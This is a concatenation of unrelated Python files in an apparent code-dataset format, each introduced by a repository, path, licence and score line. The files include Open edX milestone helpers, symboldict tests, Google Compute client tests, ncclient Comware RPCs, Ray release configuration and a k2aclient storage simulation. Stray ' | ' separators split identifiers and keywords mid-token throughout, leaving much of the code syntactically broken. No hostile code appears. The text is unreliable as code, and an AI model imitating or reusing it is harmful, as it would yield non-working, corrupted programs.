# add milestones if pre-requisite course is selected
if prerequisite_course_keys:
for prerequisite_course_key_string in prerequisite_course_keys:
prerequisite_course_key = CourseKey.from_string(prerequisite_course_key_string)
add_prerequisite_course(course_key, prerequisite_course_key)
def get_pre_requisite_courses_not_completed(user, enrolled_courses):
"""
Makes a dict mapping courses to their unfulfilled milestones using the
fulfillment API of the milestones app.
Arguments:
user (User): the user for whom we are checking prerequisites.
enrolled_courses (CourseKey): a list of keys for the courses to be
checked. The given user must be enrolled in all of these courses.
Returns:
dict[CourseKey: dict[
'courses': list[dict['key': CourseKey, 'display': str]]
]]
If a course has no incomplete prerequisites, it will be excluded from the
dictionary.
"""
if not is_prerequisite_courses_enabled():
return {}
pre_requisite_courses = {}
for course_key in enrolled_courses:
required_courses = []
fulfillment_paths = milestones_api.get_course_milestones_fulfillment_paths(course_key, {'id': user.id})
for __, milestone_value in fulfillment_paths.items():
for key, value in milestone_value.items():
if key == 'courses' and value:
for required_course in value:
required_course_key = CourseKey.from_string(required_course)
required_course_overview = CourseOverview.get_from_id(required_course_key)
required_courses.append({
'key': required_course_key,
'display': get_course_display_string(required_course_overview)
})
# If there are required courses, add them to the result dict.
if required_courses:
pre_requisite_courses[course_key] = {'courses': required_courses}
return pre_requisite_courses
def get_prerequisite_courses_display(course_descriptor):
"""
It would retrieve pre-requisite courses, make display strings
and return list of dictionary with course key as 'key' field
and course display name as `display` field.
"""
pre_requisite_courses = []
if is_prerequisite_courses_enabled() and course_descriptor.pre_requisite_courses:
for course_id in course_descriptor.pre_requisite_courses:
course_key = CourseKey.from_string(course_id)
required_course_descriptor = modulestore().get_course(course_key)
prc = {
'key': course_key,
'display': get_course_display_string(required_course_descriptor)
}
pre_requisite_courses.append(prc)
return pre_requisite_courses
def get_course_display_string(descriptor):
"""
Returns a string to display for a course or course overview.
Arguments:
descriptor (CourseBlock|CourseOverview): a course or course overview.
"""
return ' '.join([
descriptor.display_org_with_default,
descriptor.display_number_with_default
])
def fulfill_course_milestone(course_key, user):
"""
Marks the course specified by the given course_key as complete for the given user.
If any other courses require this course as a prerequisite, their milestones will be appropriately updated.
"""
if not ENABLE_MILESTONES_APP.is_enabled():
return None
try:
course_milestones = milestones_api.get_course_milestones(course_key=course_key, relationship="fulfills")
except InvalidMilestoneRelationshipTypeException:
# we have not seeded milestone relationship types
seed_milestone_relationship_types()
course_milestones = milestones_api.get_course_milestones(course_key=course_key, relationship="fulfills")
for milestone in course_milestones:
milestones_api.add_user_milestone({'id': user.id}, milestone)
def remove_course_milestones(course_key, user, relationship):
"""
Remove all user milestones for the course specified by course_key.
"" |
canaryhealth/pyramid_test | pyramid_test/__init__.py | Python | mit | 106 | 0 | # -*- coding: utf-8 -*-
from .api | import *
from .db import *
fr | om .runner import *
from .server import *
|
Gribouillis/symboldict | tests/various/test_strict.py | Python | mit | 6,420 | 0.005452 | """Strict and non strict symboldict feature tests."""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from functools import partial
import pytest
from pytest_bdd import (
given,
scenario,
then,
when,
)
import symboldict as sd
scenario = partial(scenario, '../features/strict.feature')
@scenario('Attributes of SymbolDict types are allowed keys in non strict symboldict')
def test_attributes_of_symboldict_types_are_allowed_keys_in_non_strict_symboldict():
"""Attributes of SymbolDict types are allowed keys in non strict symboldict."""
@scenario('Attributes of SymbolDict types are forbidden keys in strict symboldict')
def test_attributes_of_symboldict_types_are_forbidden_keys_in_strict_symboldict():
"""Attributes of SymbolDict types are forbidden keys in strict symboldict."""
@scenario('Check strictness of new symboldict')
def test_check_strictness_of_new_symboldict():
"""Check strictness of new symboldict."""
@scenario('Creating strict symboldict from dict having forbidden key raises TypeError')
def test_creating_strict_symboldict_from_dict_having_forbidden_key_raises_typeerror():
"""Creating strict symboldict from dict having forbidden key raises TypeError."""
@scenario('Creating strict symboldict from sequence having forbidden item raises TypeError')
def test_creating_strict_symboldict_from_sequence_having_forbidden_item_raises_typeerror():
"""Creating strict symboldict from sequence having forbidden item raises TypeError."""
@scenario('Forbidden key setting raise TypeError in strict symboldict')
def test_forbidden_key_setting_raise_typeerror_in_strict_symboldict(strict_symboldict):
"""Forbidden key setting raise TypeError in strict symboldict."""
with pytest.raises(TypeError):
strict_symboldict['update'] = 'sys.version_info'
@scenario('Setting symboldict strict raises TypeError if there is forbidden key')
def test_setting_symboldict_strict_raises_typeerror_if_there_is_forbidden_key():
"""Setting symboldict strict raises TypeError if there is forbidden key."""
@scenario('Updating strict symboldict from sequence having forbidden item raises TypeError')
def test_updating_strict_symboldict_from_sequence_having_forbidden_item_raises_typeerror():
"""Updating strict symboldict from sequence having forbidden item raises TypeError."""
@scenario('Updating strict symboldict with dict having forbidden key raises TypeError')
def test_updating_strict_symboldict_with_dict_having_forbidden_key_raises_typeerror():
"""Updating strict symboldict with dict having forbidden key raises TypeError."""
@given('dict containing forbidden key')
def dict_containing_forbidden_key():
"""dict containing forbidden key."""
@given('new <how> symboldict')
def new_how_symboldict(how):
"""new <how> symboldict."""
if how == 'empty':
return sd.SymbolDict()
else:
return sd.SymbolDict(isfile='os.path.isfile', Telnet='telnetlib.Telnet',
conju='complex.conjugate', eggs='telnetlib.eggs')
@given('non strict symboldict')
def non_strict_symboldict():
"""non strict symboldict."""
return sd.LaxSymbolDict()
@given('sequence of items containing forbidden key')
def sequence_of_items_containing_forbidden_key():
"""sequence of items containing forbidden key."""
return [('strict', 'indeed'),]
@given('strict symboldict')
def strict_symboldict():
"""strict symboldict."""
return sd.SymbolDict()
@given('symboldict containing forbidden key')
def symboldict_containing_forbidden_key():
"""symboldict containing forbidden key."""
return sd.LaxSymbolDict(values = 'dict.values')
@then('all attributes of SymbolDict type are allowed keys in symboldict')
def all_attributes_of_symboldict_type_are_allowed_keys_in_symboldict(non_strict_symboldict):
"""all attributes of SymbolDict type are allowed keys in symboldict."""
for key in dir(sd.SymbolDict):
non_strict_symboldict[key] = 'sys.version_info'
@then('creating strict symboldict from dict raises TypeError')
def creating_strict_symboldict_from_dict_raises_typeerror(dict_containing_forbidden_key):
"""creating strict symboldict from dict raises TypeError."""
with pytest.raises(TypeError):
sd.SymbolDict(dict_containing_forbidden_key)
@then('creating strict symboldict from sequence raises TypeError')
def creating_strict_symboldict_from_sequence_raises_typeerror(
sequence_of_items_containing_forbidden_key):
"""creating strict symboldict from sequence raises TypeError."""
with pytest.raises(TypeError):
sd.SymbolDict(sequence_of_items_containing_forbidden_key)
@then('every attribute of SymbolDict type is forbidden key in symboldict')
def every_attribute_of_symboldict_type_is_forbidden_key_in_symboldict(strict_symboldict):
"""every attribute of SymbolDict type is forbidden key in symboldict."""
s = sd.Symbol('sys.executable')
for key in dir(sd.SymbolDict):
with pytest.raises(TypeError):
strict_symboldict[key] = s
@then('setting symboldict item with forbidden key raises TypeError')
def setting_symboldict_item_with_forbidden_key_raises_typeerror():
"""setting symboldict item with forbidden key raises TypeError."""
@then('setting symboldict strict raises TypeError')
def setting_symboldict_strict_raises_typeerror(symboldict_containing_forbidden_key):
"""setting symboldict strict raises TypeError."""
with pytest.raises(TypeError):
symboldict_containing_forbidden_key.strict = True
@then('symboldict is strict')
def symboldict_is_strict(new_how_symboldict):
"""symboldict is strict."""
assert new_how_symboldict.strict
@then('updating symboldict from sequence raises TypeError')
def updating_symboldict_from_sequence_raises_typeerror(
strict_symboldict, sequence_of_items_containing_forbidden_key):
"""updating symboldict from sequence raises TypeError."""
with pytest.raises(TypeError):
strict_symboldict.update(sequence_of_items_containing_forbidden_key)
@then('updating symboldict with dict rai | ses TypeError')
def upda | ting_symboldict_with_dict_raises_typeerror(
strict_symboldict, dict_containing_forbidden_key):
"""updating symboldict with dict raises TypeError."""
with pytest.raises(TypeError):
strict_symboldict.update(dict_containing_forbidden_key)
|
googleapis/python-compute | tests/unit/gapic/compute_v1/test_global_public_delegated_prefixes.py | Python | apache-2.0 | 96,661 | 0.001335 | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
from collections.abc import Iterable
import json
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests import Request, PreparedRequest
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.global_public_delegated_prefixes import (
GlobalPublicDelegatedPrefixesClient,
)
from google.cloud.compute_v1.services.global_public_delegated_prefixes import pagers
from google.cloud.compute_v1.services.global_public_delegated_prefixes import transports
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(None) is None
assert (
GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(api_endpoint)
== api_mtls_endpoint
)
assert (
| GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(
api_mtls_endpoint
)
== api_mtls_endpoint
)
assert (
GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
GlobalPublicDelegatedPrefixesClient._get_default_mtls_endpoint(
sandbox_mtls_endpoint
)
== sandbox_mtls_endpoint
)
assert (
GlobalPubli | cDelegatedPrefixesClient._get_default_mtls_endpoint(non_googleapi)
== non_googleapi
)
@pytest.mark.parametrize(
"client_class,transport_name", [(GlobalPublicDelegatedPrefixesClient, "rest"),]
)
def test_global_public_delegated_prefixes_client_from_service_account_info(
client_class, transport_name
):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info, transport=transport_name)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == (
"compute.googleapis.com{}".format(":443")
if transport_name in ["grpc", "grpc_asyncio"]
else "https://{}".format("compute.googleapis.com")
)
@pytest.mark.parametrize(
"transport_class,transport_name",
[(transports.GlobalPublicDelegatedPrefixesRestTransport, "rest"),],
)
def test_global_public_delegated_prefixes_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize(
"client_class,transport_name", [(GlobalPublicDelegatedPrefixesClient, "rest"),]
)
def test_global_public_delegated_prefixes_client_from_service_account_file(
client_class, transport_name
):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == (
"compute.googleapis.com{}".format(":443")
if transport_name in ["grpc", "grpc_asyncio"]
else "https://{}".format("compute.googleapis.com")
)
def test_global_public_delegated_prefixes_client_get_transport_class():
transport = GlobalPublicDelegatedPrefixesClient.get_transport_class()
available_transports = [
transports.GlobalPublicDelegatedPrefixesRestTransport,
]
assert transport in available_transports
transport = GlobalPublicDelegatedPrefixesClient.get_transport_class("rest")
assert transport == transports.GlobalPublicDelegatedPrefixesRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(
GlobalPublicDelegatedPrefixesClient,
transports.GlobalPublicDelegatedPrefixesRestTransport,
"rest",
),
],
)
@mock.patch.object(
GlobalPublicDelegatedPrefixesClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(GlobalPublicDelegatedPrefixesClient),
)
def test_global_public_delegated_prefixes_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(
GlobalPublicDelegatedPrefixesClient, "get_transport_class"
) as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(
GlobalPublicDelegatedPrefixesClient, "get_transport_class"
) as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
h |
GIC-de/ncclient | ncclient/operations/third_party/hpcomware/rpc.py | Python | apache-2.0 | 1,760 | 0 | from lxml import etree
from ncclient.xml_ import *
from ncclient.operations.rpc import RPC
class DisplayCommand(RPC):
def request(self, cmds):
"""
Single Execution element is permitted.
cmds can be a list or single command
| """
if isinstance(cmds, list):
cmd = '\n'.join(cmds)
elif isinstance(cmds, str) or isinstance(cmds, unicode):
cmd = cmds
node = etree.Element(qualify('CLI', BASE_NS_1_0))
etree.SubElement(node, qualify('Execution',
| BASE_NS_1_0)).text = cmd
return self._request(node)
class ConfigCommand(RPC):
def request(self, cmds):
"""
Single Configuration element is permitted.
cmds can be a list or single command
commands are pushed to the switch in this method
"""
if isinstance(cmds, list):
cmd = '\n'.join(cmds)
elif isinstance(cmds, str) or isinstance(cmds, unicode):
cmd = cmds
node = etree.Element(qualify('CLI', BASE_NS_1_0))
etree.SubElement(node, qualify('Configuration',
BASE_NS_1_0)).text = cmd
return self._request(node)
class Action(RPC):
def request(self, action=None):
node = new_ele("action")
node.append(validated_element(action))
return self._request(node)
class Save(RPC):
def request(self, filename=None):
node = new_ele('save')
sub_ele(node, 'file').text = filename
return self._request(node)
class Rollback(RPC):
def request(self, filename=None):
node = new_ele('rollback')
sub_ele(node, 'file').text = filename
return self._request(node)
|
tamasgal/django-tornado | demosite/demosite/urls.py | Python | mit | 164 | 0.006098 | f | rom django.conf.urls import patterns, include, url
from django.contrib import admin
ur | lpatterns = patterns('',
(r'^hello-django', 'demosite.views.hello'),
)
|
bl4ckdu5t/registron | tests/libraries/test_xml.py | Python | mit | 432 | 0.00463 | #- | ----------------------------------------------------------------------------
# Copyright (c) 2013, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#---------------------------------------------------------------------- | -------
# xml hook test
import xml
|
nlhkabu/connect | connect/accounts/utils.py | Python | bsd-3-clause | 2,295 | 0 | from django import forms
from django.contrib.auth import get_user_model
from django.contrib.sites.shortcuts import get_current_site
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from connect.utils import send_connect_email, generate_unique_id
def create_inactive_user(email, full_name):
"""
Create inactive user with basic details.
Used when mo | derators invite new users and when a member of the public
requests an account.
"""
User = get_user_model()
user = User.objects.create_user(email)
user.is_active = False
user.full_name = full_name
user.set_unusable_password()
return user
def invite_use | r_to_reactivate_account(user, request):
"""
Send an email to a user asking them if they'd like to reactivate
their account.
"""
# Build and send a reactivation link for closed account
user.auth_token = generate_unique_id() # Reset token
user.auth_token_is_used = False
user.save()
site = get_current_site(request)
url = request.build_absolute_uri(
reverse('accounts:activate-account',
args=[user.auth_token]))
# Send email
subject = _('Reactivate your {} account'.format(site.name))
template = 'accounts/emails/reactivate_account.html'
send_connect_email(subject=subject,
template=template,
recipient=user,
site=site,
url=url)
return user
def get_user(email):
"""
Retrieve a user based on the supplied email address.
Return None if no user has registered this email address.
"""
User = get_user_model()
try:
user = User.objects.get(email=email)
return user
except User.DoesNotExist:
return None
def validate_email_availability(email):
"""
Check that the email address is not registered to an existing user.
"""
user = get_user(email)
if user:
raise forms.ValidationError(
ugettext_lazy('Sorry, this email address is already '
'registered to another user.'),
code='email_already_registered'
)
else:
return True
|
ray-project/ray | release/ray_release/config.py | Python | apache-2.0 | 6,617 | 0.000907 | import copy
import datetime
import json
import os
from typing import Dict, List, Optional
import jinja2
import jsonschema
import yaml
from ray_release.anyscale_util import find_cloud_by_name
from ray_release.exception import ReleaseTestConfigError
from ray_release.logger import logger
from ray_release.util import deep_update
class Test(dict):
pass
DEFAULT_WHEEL_WAIT_TIMEOUT = 7200 # Two hours
DEFAULT_COMMAND_TIMEOUT = 1800
DEFAULT_BUILD_TIMEOUT = 1800
DEFAULT_CLUSTER_TIMEOUT = 1800
DEFAULT_CLOUD_ID = "cld_4F7k8814aZzGG8TNUGPKnc"
DEFAULT_ENV = {
"DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
"TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
"EXPIRATION_1D": str(
(datetime.datetime.now() + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
),
"EXPIRATION_2D": str(
(datetime.datetime.now() + datetime.timedelta(days=2)).strftime("%Y-%m-%d")
),
"EXPIRATION_3D": str(
(datetime.datetime.now() + datetime.timedelta(days=3)).strftime("%Y-%m-%d")
),
}
RELEASE_PACKAGE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
RELEASE_TEST_SCHEMA_FILE = os.path.join(
RELEASE_PACKAGE_DIR, "ray_release", "schema.json"
)
class TestEnvironment(dict):
pass
_test_env = None
def get_test_environment():
global _test_env
if _test_env:
return _test_env
_test_env = TestEnvironment(**DEFAULT_ENV)
return _test_env
def set_test_env_var(key: str, value: str):
test_env = get_test_environment()
test_env[key] = value
def get_test_env_var(key: str, default: Optional[str] = None):
test_env = get_test_environment()
return test_env.get(key, default)
def read_and_validate_release_test_collection(config_file: str) -> List[Test]:
"""Read and validate test collection from config file"""
with open(config_file, "rt") as fp:
test_config = yaml.safe_load(fp)
validate_release_test_collection(test_config)
return test_config
def load_schema_file(path: Optional[str] = None) -> Dict:
path = path or RELEASE_TEST_SCHEMA_FILE
with open(path, "rt") as fp:
return json.load(fp)
def validate_release_test_collection(test_collection: List[Test]):
try:
schema = load_schema_file()
except Exception as e:
raise ReleaseTestConfigError(
f"Could not load release test validation schema: {e}"
) from e
num_errors = 0
for test in test_collection:
error = validate_test(test, schema)
if error:
logger.error(
f"Failed to validate test {test.get('name', '(unnamed)')}: {error}"
)
num_errors += 1
if num_errors > 0:
raise ReleaseTestConfigError(
f"Release test configuration error: Found {num_errors} test "
f"validation errors."
)
def validate_test(test: Test, schema: Optional[Dict] = None) -> Optional[str]:
schema = schema or load_schema_file()
try:
jsonschema.validate(test, schema=schema)
except (jsonschema.ValidationError, jsonschema.SchemaError) as e:
return str(e.message)
except Exception as e:
return str(e)
def find_test(test_collection: List[Test], test_name: str) -> Optional[Test]:
"""Find test with `test_name` in `test_collection`"""
for test in test_collection:
if test["name"] == test_name:
return test
return None
def as_smoke_test(test: Test) -> Test:
if "smoke_test" not in test:
logger.warning(
f"Requested smoke test, but test with name {test['name']} does "
f"not have any smoke test configuration."
)
return test
smoke_test_config = test.pop("smoke_test")
new_test = deep_update(test, smoke_test_config)
return new_test
def get_wheels_sanity_check(commit: Optional[str] = None):
if not commit:
cmd = (
"python -c 'import ray; print("
'"No commit sanity check available, but this is the '
"Ray wheel commit:\", ray.__commit__)'"
)
else:
cmd = (
f"python -c 'import ray; "
f'assert ray.__commit__ == "{commit}", ray.__commit__\''
)
return cmd
def load_and_render_yaml_template(
template_path: str, env: Optional[Dict] = None
) -> Optional[Dict]:
if not template_path:
return None
if not os.path.exists(template_path):
raise ReleaseTestConfigError(
f"Cannot load yaml template from {template_path}: Path not found."
)
with open(template_path, "rt") as f:
content = f.read()
render_env = copy.deepcopy(os.environ)
if env:
render_env.update(env)
try:
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
except Exception as e:
raise ReleaseTestConfigError(
f"Error rendering/loading yaml template: {e}"
) from e
def load_test_cluster_env(test: Test, ray_wheels_url: str) -> Optional[Dict]:
cluster_env_file = test["cluster"]["cluster_env"]
cluster_env_path = os.path.join(
RELEASE_PACKAGE_DIR, test.get("working_dir", ""), cluster_env_file
)
env = get_test_environment()
commit = env.get("RAY_COMMIT", None)
env["RAY_WHEELS_SANITY_CHECK"] = get_wheels_sanity_check(commit)
env["RAY_WHEELS"] = ray_wheels_url
return load_and_render_yaml_template(cluster_env_path, env=env)
def load_test_cluster_compute(test: Test) -> Optional[Dict]:
cluster_compute_file = test["cluster"]["cluster_compute"]
cluster_compute_path = os.path.join(
RELEASE_PACKAGE_DIR, test.get("working_dir", ""), cluster_compute_file
)
env = get_test_environment()
cloud_id = get_test_cloud_id(test)
env["ANYSCALE_CLOUD_ID"] = cloud_id
return load_and_render_yaml_template(cluster_compute_path, env=env)
def get_test_cloud_id(test: Test) -> str:
cloud_id = test["cluster"].get("cloud_id", None)
cloud_name = test["cluster"].get("cloud_name", None)
if cloud_id and cloud_name:
raise RuntimeError(
f"You can't supply both a `cloud_name` ({cloud_name}) and a "
f"`cloud_id` ({cloud_id}) in the test | cluster configuration. "
f"Please provide only one."
)
elif cloud_name and not cloud_id:
cloud_id = find_cloud_by_name(cloud_name)
if not cloud_id:
| raise RuntimeError(f"Couldn't find cloud with name `{cloud_name}`.")
else:
cloud_id = cloud_id or DEFAULT_CLOUD_ID
return cloud_id
|
deepmind/acme | examples/open_spiel/run_dqn.py | Python | apache-2.0 | 2,566 | 0.007015 | # python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language gove | rning permissions and
# limitations under the License.
"""Example running DQN on OpenSpiel game in a single process."""
from absl import app
from absl import flags
import acme
from acme import wrappers
from acme.agents.tf import dqn
from acme.environment_loops import open_spiel_environment_loop
from | acme.tf.networks import legal_actions
from acme.wrappers import open_spiel_wrapper
import sonnet as snt
from open_spiel.python import rl_environment
flags.DEFINE_string('game', 'tic_tac_toe', 'Name of the game')
flags.DEFINE_integer('num_players', None, 'Number of players')
FLAGS = flags.FLAGS
def main(_):
# Create an environment and grab the spec.
env_configs = {'players': FLAGS.num_players} if FLAGS.num_players else {}
raw_environment = rl_environment.Environment(FLAGS.game, **env_configs)
environment = open_spiel_wrapper.OpenSpielWrapper(raw_environment)
environment = wrappers.SinglePrecisionWrapper(environment) # type: open_spiel_wrapper.OpenSpielWrapper # pytype: disable=annotation-type-mismatch
environment_spec = acme.make_environment_spec(environment)
# Build the networks.
networks = []
policy_networks = []
for _ in range(environment.num_players):
network = legal_actions.MaskedSequential([
snt.Flatten(),
snt.nets.MLP([50, 50, environment_spec.actions.num_values])
])
policy_network = snt.Sequential(
[network,
legal_actions.EpsilonGreedy(epsilon=0.1, threshold=-1e8)])
networks.append(network)
policy_networks.append(policy_network)
# Construct the agents.
agents = []
for network, policy_network in zip(networks, policy_networks):
agents.append(
dqn.DQN(environment_spec=environment_spec,
network=network,
policy_network=policy_network))
# Run the environment loop.
loop = open_spiel_environment_loop.OpenSpielEnvironmentLoop(
environment, agents)
loop.run(num_episodes=100000)
if __name__ == '__main__':
app.run(main)
|
ocpnetworking-wip/oom | oom/oomtypes.py | Python | mit | 811 | 0.001233 | # ////////////////////////////////////// | ///////////////////////////////
#
# oomtypes.py : Common type definitions used by multiple OOM mod | ules
#
# Copyright 2015 Finisar Inc.
#
# Author: Don Bollinger don@thebollingers.org
#
# ////////////////////////////////////////////////////////////////////
import struct
from ctypes import *
#
# This class recreates the port structure in the southbound API
#
class c_port_t(Structure):
_fields_ = [("handle", c_void_p),
("oom_class", c_int),
("name", c_ubyte * 32)]
# Southbound API will report the 'class' of a module, basically
# whether it uses i2c addresses, pages, and bytes (SFF) or
# it uses mdio, a flat 16 bit address space, and words (CFP)
port_class_e = {
'UNKNOWN': 0x00,
'SFF': 0x01,
'CFP': 0x02
}
|
windskyer/k_cinder | paxes_cinder/k2aclient/k2asample/tool_ssp_simulation.py | Python | apache-2.0 | 36,321 | 0.000854 | #
# =================================================================
# =================================================================
# def _enum(**enums):
# return type('Enum', (), enums)
import eventlet
from eventlet import greenthread
import paxes_cinder.k2aclient.k2asample as k2asample
from paxes_cinder.k2aclient.v1 import k2uom
from paxes_cinder.k2aclient.k2asample import dump_k2resp
from paxes_cinder.k2aclient import client
from paxes_cinder.k2aclient.openstack.common import lockutils
from paxes_cinder.k2aclient import exceptions as k2exceptions
from paxes_cinder.k2aclient.k2asample.k2_ssp_cluster_vios_snap \
import cluster_vios_snap
from itertools import repeat
from collections import deque
import time
import pickle
import logging
from os.path import expanduser
from random import randrange
import json
import random
import datetime
import paxes_cinder.k2aclient.v1.cluster_manager as cluster_manager
# import numpy as np
MOCK = False
VIOS_DUMP_ACTIVATED = False
synchronized = lockutils.synchronized_with_prefix('k2a-')
class MockLu(object):
ugenid = 0
def __init__(self):
self.unique_device_id = MockLu.ugenid
MockLu.ugenid += 1
def _timer(prev_time):
"""Simple timer"""
return time.time() - prev_time
def _chunks(l, n):
""" Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i + n]
_last_dump = None
@synchronized('simulation')
def _process_k2_exception(simulation, e):
if not VIOS_DUMP_ACTIVATED:
msg = ("Exception:"
" msg: >%s<,"
" VIOS dump is not activated,"
" continuing ...")
print (msg % (e,))
return
time_between_dumps = 300
global _last_dump
if _last_dump is not None:
delta = time.time() - _last_dump
if delta < time_between_dumps:
msg = ("exception: >%s<,"
" recent dump,"
" take a break ...")
print (msg, (e,))
greenthread.sleep(100)
return
dump = False
diagfspec = None
if isinstance(e, k2exceptions.K2aCrudException):
dump = True
diagfspec = e.diagfspec
elif isinstance(e, k2exceptions.K2aK2Error):
dump = True
diagfspec = e.diagfspec
elif isinstance(e, k2exceptions.K2JobFailure):
dump = True
diagfspec = e.diagfspec
if dump and diagfspec is not None:
msg = ("exception: >%s<, "
" take a dump corresponding "
" to e.diagfspec: >%s<, "
" and then take a break ...")
print (msg % (e, diagfspec,))
if simulation.vios_password is not None:
cluster_vios_snap(simulation.image_pool.vios_ips,
diagfspec + ".vios",
password=simulation.vios_password)
greenthread.sleep(100)
_last_dump = time.time()
else:
msg = ("exception: >%s<,"
" but no dump ...")
print (msg % (e,))
def _enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.iteritems())
enums['reverse_mapping'] = reverse
return type('Enum', (), enums)
# def _enum(*sequential):
# enums = dict(zip(sequential,sequential))
# return type('Enum', (), enums)
OperationType = _enum("DEPLOY_FROM_IMAGE",
"DEPLOY_FROM_SNAPSHOT",
"SNAPSHOT_A_DEPLOY",
"DELETE_A_SNAPSHOT",
"DELETE_A_DEPLOY")
DeployState = _enum("INCREASING",
"DECREASING")
SnapshotState = _enum("INCREASING",
"DECREASING")
def _record(simulation, operation, e, duration):
# mu, sigma = 1500, 150
# # # x = mu + sigma * np.random.randn(10000)
# #
# # duration = time.time()-start
# # duration = mu + sigma * np.random.randn()
#
# for i, d in enumerate(duration):
# duration[i] = mu + sigma * np.random.randn()
estr = None
if e is not None:
estr = str(e)
if MOCK:
t = time.time() * 10000.0
else:
t = time.time()
simulation.operations.append((operation.type, estr, duration, t))
# track number of snapshots and number of deploys
if len(simulation.deploys_at_oper) == 0:
prev_deploys = 0
else:
prev_deploys = simulation.deploys_at_oper[-1]
if len(simulation.snapshots_at_oper) == 0:
prev_snapshots = 0
else:
prev_snapshots = simulation.snapshots_at_oper[-1]
if operation.type == OperationType.DEPLOY_FROM_IMAGE:
simulation.deploys_at_oper.append(prev_deploys + 1)
simulation.snapshots_at_oper.append(prev_snapshots)
elif operation.type == OperationType.DEPLOY_FROM_SNAPSHOT:
simulation.deploys_at_oper.append(prev_deploys + 1)
simulation.snapshots_at_oper.append(prev_snapshots)
elif operation.type == OperationType.SNAPSHOT_A_DEPLOY:
simulation.deploys_at_oper.append(prev_deploys)
simulation.snapshots_at_oper.append(prev_snapshots + 1)
elif operation.type == OperationType.DELETE_A_SNAPSHOT:
simulation.deploys_at_oper.append(prev_deploys)
simulation.snapshots_at_oper.append(prev_snapshots - 1)
elif operation.type == OperationType.DELETE_A_DEPLOY:
simulation.deploys_at_oper.append(prev_deploys - 1)
simulation.snapshots_at_oper.append(prev_snapshots)
def _parse_vios(node_vios):
